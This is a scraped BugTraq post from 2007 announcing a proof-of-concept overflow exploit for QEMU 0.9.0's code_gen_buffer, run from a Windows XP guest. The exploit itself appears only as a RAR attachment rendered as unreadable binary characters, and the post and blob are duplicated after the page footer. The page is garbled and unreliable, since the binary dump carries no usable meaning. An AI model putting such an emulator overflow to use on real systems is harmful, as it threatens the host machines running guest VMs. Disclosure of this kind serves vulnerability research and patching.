BugTraq
Back to list
|
Post reply
QEMU code_gen_buffer overflow POC
Nov 30 2007 04:26PM
TeLeMan (geleman gmail com)
This POC is a windows exe and was tested on QEMU v0.9.0 (Guest OS is
Windows XP SP2).
This overflow will overwrite the TranslationBlock buffer.
--
SUN OF A BEACH
Rar!Ïs
ØÏt ?,?
-??ïI¸~75 qemu-dos.comçM³-mæ,zgytÄå?Û~%ìt|±?-Vm¡@F??"£jH>?&ï¤? x§?A¹ý5Û£¦qº?¼?¥?g?;?9¸?÷Ì;ß2?ò-8bZO.Q~ìD>?X??ÿÜÃ9?3&?:á?·°ém|8j{?Y¤÷?óÝá'?Cc?Ë»BLÀ 1Op ?S??i7?^ºpþ?v`/ô]
¼g?>ÀÉ9Ä(}á?w?
ý{Xåâ}îÌjYÿ"ú?åNöÆsSè-?ÃàíàÙ?Î
qÊFRÕAK?/º£?Tð«Ê???/ý;Í
1ý
?4¶1ÄüÚÍ??ùÉ??V/6+Ϫ@Òt]©½C
%ݧ¿O¦£r?ÏÑ» Iв®H$?
¯?7÷é*0~¡¬ð |ú·K;:?éÍÕ?w0e/G¤àÔ!©ÜôiÝøëg]>åMf¶ëN=?:Jë©{ ?èÜ»?cuePxoËõÒÆ?ô
ÔC]§¦®ºþÎôºJÍDc÷q?¬£v[ÿ·00ë?hÕ|?g?·@í_<Ò~?ë¢ÈÀl¥<+˼?öس
|½lBÞiÅ ¶¶/ì¢gâ(Äó@Þë?³}ë»m¦Ô¢JbÝr?£Å×±ÝîÒ1Bc¯/¦²f?îÕéQzáltÞ¤úâå4Ï$"?ç°+ò8?}Vj]Q?¬\1ÄÂÛ±yÛ/?\rp.ùTOáe$|9yã°]YTèp
³ÿb=ìäíÛEN¿AY4_» é)³'²±?»Râ?Ý{Ç©8àë ©\9¸["?SÜU?E&1 R?£?«ðu ¥õIWï?3²???ÉèC& éUjQíçs;½Þiâ%J?Ëç?30D'ÜDªìût§\`¾Ye£þãÞweße'>bÅ?³LÞ Ë?÷¦²àm;Û?t6]??M??T2_ÔV?pÙ¼íùfÂ{ÇÍì?ua©º)?Ï?XUpëvÛ?óÏèQ
vizâÌæGç«ÍQáygîaöu·?í2Ñ%ßFÕó8ÖtºõD1þA~Í´}X¡öÄHêzpµF?þë[Çüæ@üúM
¿?gö©ÿÔÄ={@
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Windows XP SP2).
This overflow will overwrite the TranslationBlock buffer.
--
SUN OF A BEACH
Rar!Ïs
ØÏt ?,?
-??ïI¸~75 qemu-dos.comçM³-mæ,zgytÄå?Û~%ìt|±?-Vm¡@F??"£jH>?&ï¤? x§?A¹ý5Û£¦qº?¼?¥?g?;?9¸?÷Ì;ß2?ò-8bZO.Q~ìD>?X??ÿÜÃ9?3&?:á?·°ém|8j{?Y¤÷?óÝá'?Cc?Ë»BLÀ 1Op ?S??i7?^ºpþ?v`/ô]
¼g?>ÀÉ9Ä(}á?w?
ý{Xåâ}îÌjYÿ"ú?åNöÆsSè-?ÃàíàÙ?Î
qÊFRÕAK?/º£?Tð«Ê???/ý;Í
1ý
?4¶1ÄüÚÍ??ùÉ??V/6+Ϫ@Òt]©½C
%ݧ¿O¦£r?ÏÑ» Iв®H$?
¯?7÷é*0~¡¬ð |ú·K;:?éÍÕ?w0e/G¤àÔ!©ÜôiÝøëg]>åMf¶ëN=?:Jë©{ ?èÜ»?cuePxoËõÒÆ?ô
ÔC]§¦®ºþÎôºJÍDc÷q?¬£v[ÿ·00ë?hÕ|?g?·@í_<Ò~?ë¢ÈÀl¥<+˼?öس
|½lBÞiÅ ¶¶/ì¢gâ(Äó@Þë?³}ë»m¦Ô¢JbÝr?£Å×±ÝîÒ1Bc¯/¦²f?îÕéQzáltÞ¤úâå4Ï$"?ç°+ò8?}Vj]Q?¬\1ÄÂÛ±yÛ/?\rp.ùTOáe$|9yã°]YTèp
³ÿb=ìäíÛEN¿AY4_» é)³'²±?»Râ?Ý{Ç©8àë ©\9¸["?SÜU?E&1 R?£?«ðu ¥õIWï?3²???ÉèC& éUjQíçs;½Þiâ%J?Ëç?30D'ÜDªìût§\`¾Ye£þãÞweße'>bÅ?³LÞ Ë?÷¦²àm;Û?t6]??M??T2_ÔV?pÙ¼íùfÂ{ÇÍì?ua©º)?Ï?XUpëvÛ?óÏèQ
vizâÌæGç«ÍQáygîaöu·?í2Ñ%ßFÕó8ÖtºõD1þA~Í´}X¡öÄHêzpµF?þë[Çüæ@üúM
¿?gö©ÿÔÄ={@
[ reply ]